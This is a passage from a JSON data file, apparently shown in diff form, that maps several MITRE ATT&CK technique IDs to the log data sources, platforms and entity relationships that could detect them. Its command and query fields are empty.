"https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1556", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + 
"collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows 
registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1056.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about 
file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1552.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1021.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + 
"data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
